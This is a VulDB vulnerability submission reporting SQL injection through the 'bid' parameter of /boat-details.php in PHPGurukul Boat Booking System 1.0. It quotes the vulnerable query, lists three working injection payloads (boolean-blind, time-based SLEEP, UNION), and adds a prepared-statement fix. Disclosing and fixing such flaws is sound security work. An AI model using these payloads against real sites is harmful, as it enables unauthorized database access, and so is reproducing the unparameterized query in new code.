| Title | PHPGurukul Boat Booking System-PHP v1.0 SQL Injection |
|---|
| Description | # CVE Report - Phpgurukul Boat Booking System-PHP V1.0 SQL injection in /boat-details.php
## Vulnerability Title
SQL injection Vulnerability in Phpgurukul Boat Booking System-PHP V1.0
## Vulnerability Description
SQL injection is a code injection technique used to attack data-driven applications by inserting malicious SQL statements into an entry field for execution. It exploits vulnerabilities in an application's software, such as improper filtering of user input or lack of strong typing, allowing attackers to manipulate SQL queries. This can lead to unauthorized access, data breaches, and other serious security issues.
## Affected Components
- File: /boat-details.php
- Line: 65
- Vulnerable Code:
```php
$rs = $query = mysqli_query($con, "SELECT * FROM tblboat WHERE ID='$bid'");
```
## Attack Steps
- boolean-based blind
```
bid=1' AND 2740=2740 AND 'wrlL'='wrlL
```
- time-based blind
```
bid=1' AND (SELECT 1184 FROM (SELECT(SLEEP(5)))BDaU) AND 'ALMH'='ALMH
```
- UNION query
```
bid=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7171,0x585044684d4e5a71486a506966564a565a686a67416a63716a6f647a53484f5349684769445a4275,0x716b627a71),NULL,NULL,NULL,NULL-- -
```
## Affected Versions
Phpgurukul Boat Booking System-PHP V1.0
## Suggested Fix
Please fix the code in a timely manner and update the code version.
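The query on line 65 beside a hardened form using a bound parameter, as an added example that is not code from PHPGurukul or from the reporter. It assumes `$con` is the application's already-open mysqli connection, that `bid` arrives in `$_GET`, that `tblboat.ID` is an integer column, and that the mysqlnd driver is available; `fetch_boat` is a hypothetical helper name.

```php
<?php
// Added example, not the project's own code.
// Before (from the report): the value of bid is pasted into the SQL text.
//   mysqli_query($con, "SELECT * FROM tblboat WHERE ID='$bid'");

/**
 * Hypothetical helper: fetch one boat row by ID with a bound parameter.
 * Returns the row as an associative array, or null when bid is not a
 * positive integer or no row matches.
 */
function fetch_boat(mysqli $con, $rawBid): ?array
{
    // Assumption: tblboat.ID is an integer key, so anything that is not a
    // positive integer is rejected before the database is touched.
    $bid = filter_var($rawBid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($bid === false) {
        return null;
    }

    // The placeholder keeps the value out of the SQL text, so quotes and
    // AND / UNION / SLEEP() fragments in bid are never parsed as SQL.
    $stmt = mysqli_prepare($con, "SELECT * FROM tblboat WHERE ID = ?");
    if ($stmt === false) {
        // Log server-side only; do not echo database errors to the client.
        error_log('boat-details: prepare failed: ' . mysqli_error($con));
        return null;
    }
    mysqli_stmt_bind_param($stmt, 'i', $bid);
    mysqli_stmt_execute($stmt);
    $result = mysqli_stmt_get_result($stmt); // requires mysqlnd
    $row = $result ? mysqli_fetch_assoc($result) : null;
    mysqli_stmt_close($stmt);
    return $row ?: null;
}

// Assumption: bid is a GET parameter; the report only gives its name.
$boat = fetch_boat($con, $_GET['bid'] ?? '');
if ($boat === null) {
    http_response_code(404);
    exit('Boat not found');
}
```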
## Contact Information
- Reporter: 1cfh |
|---|
| Source | https://github.com/1cfh/vuln-pub/issues/1 |
|---|
| User | 1cfh (UID 82595) |
|---|
| Submission | 09.03.2025 15:13 (1 year ago) |
|---|
| Moderation | 17.03.2025 19:55 (8 days later) |
|---|
| Status | accepted |
|---|
| VulDB entry | 299964 [PHPGurukul Boat Booking System 1.0 /boat-details.php bid SQL injection] |
|---|
| Points | 20 |
|---|